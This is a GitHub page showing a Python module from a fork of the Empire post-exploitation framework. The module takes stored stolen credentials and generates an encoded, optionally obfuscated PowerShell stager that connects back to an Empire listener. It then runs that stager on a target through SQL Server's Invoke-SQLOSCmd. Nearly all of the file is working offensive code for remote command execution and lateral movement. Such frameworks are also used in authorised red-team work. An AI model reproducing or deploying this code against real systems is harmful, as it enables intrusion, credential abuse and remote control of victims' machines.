forked from EmpireProject/Empire
-
-
Notifications
You must be signed in to change notification settings - Fork 585
/
Copy pathinvoke_sqloscmd.py
85 lines (72 loc) · 3.01 KB
/
invoke_sqloscmd.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
from empire.server.common.empire import MainMenu
from empire.server.core.db.base import SessionLocal
from empire.server.core.module_models import EmpireModule
from empire.server.utils.module_util import handle_error_message
class Module:
@staticmethod
def generate(
main_menu: MainMenu,
module: EmpireModule,
params: dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
cred_id = params["CredID"]
if cred_id != "":
with SessionLocal() as db:
cred = main_menu.credentialsv2.get_by_id(db, cred_id)
if not cred:
return handle_error_message("[!] CredID is invalid!")
if cred.domain != "":
params["UserName"] = str(cred.domain) + "\\" + str(cred.username)
else:
params["UserName"] = str(cred.username)
if cred.password != "":
params["Password"] = cred.password
# staging options
listener_name = params["Listener"]
userAgent = params["UserAgent"]
proxy = params["Proxy"]
proxy_creds = params["ProxyCreds"]
instance = params["Instance"]
command = params["Command"]
username = params["UserName"]
password = params["Password"]
launcher_obfuscate = params["Obfuscate"].lower() == "true"
launcher_obfuscate_command = params["ObfuscateCommand"]
# read in the common module source code
script, err = main_menu.modulesv2.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
if command == "":
if not main_menu.listenersv2.get_active_listener_by_name(listener_name):
return handle_error_message("[!] Invalid listener: " + listener_name)
launcher = main_menu.stagers.generate_launcher(
listenerName=listener_name,
language="powershell",
encode=True,
obfuscate=launcher_obfuscate,
obfuscation_command=launcher_obfuscate_command,
userAgent=userAgent,
proxy=proxy,
proxyCreds=proxy_creds,
bypasses=params["Bypasses"],
)
if launcher == "":
return handle_error_message("[!] Error generating launcher")
command = "C:\\Windows\\System32\\WindowsPowershell\\v1.0\\" + launcher
script_end = f'Invoke-SQLOSCmd -Instance "{instance}" -Command "{command}"'
if username != "":
script_end += " -UserName " + username
if password != "":
script_end += " -Password " + password
return main_menu.modulesv2.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)